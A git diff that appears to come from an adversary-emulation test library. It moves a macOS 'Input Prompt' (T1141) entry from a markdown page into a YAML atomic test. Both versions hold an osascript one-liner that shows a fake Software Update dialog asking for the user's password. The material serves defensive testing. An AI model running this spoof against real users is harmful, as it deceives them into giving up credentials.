diff --git a/Mac/Credential_Access/Input_Prompt.md b/Mac/Credential_Access/Input_Prompt.md
deleted file mode 100644
index 154252c5..00000000
--- a/Mac/Credential_Access/Input_Prompt.md
+++ /dev/null
@@ -1,12 +0,0 @@
-# Input Prompt
-
-MITRE ATT&CK Technique: [T1141](https://attack.mitre.org/wiki/Technique/T1141)
-
-
-### Prompt User for Password (Local Phishing)
-
-    osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return  default answer "" with icon 1 with hidden answer with title "Software Update"'
-
-Reference:
-
-http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
diff --git a/atomics/T1141/T1141.yaml b/atomics/T1141/T1141.yaml
new file mode 100644
index 00000000..23289aa5
--- /dev/null
+++ b/atomics/T1141/T1141.yaml
@@ -0,0 +1,18 @@
+---
+attack_technique: T1141
+display_name: Input Prompt
+
+atomic_tests:
+- name: Prompt User for Password
+  description: |
+    Prompt User for Password (Local Phishing)
+    Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
+
+  supported_platforms:
+    - macos
+
+
+  executor:
+    name: sh
+    command: |
+      osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return  default answer "" with icon 1 with hidden answer with title "Software Update"'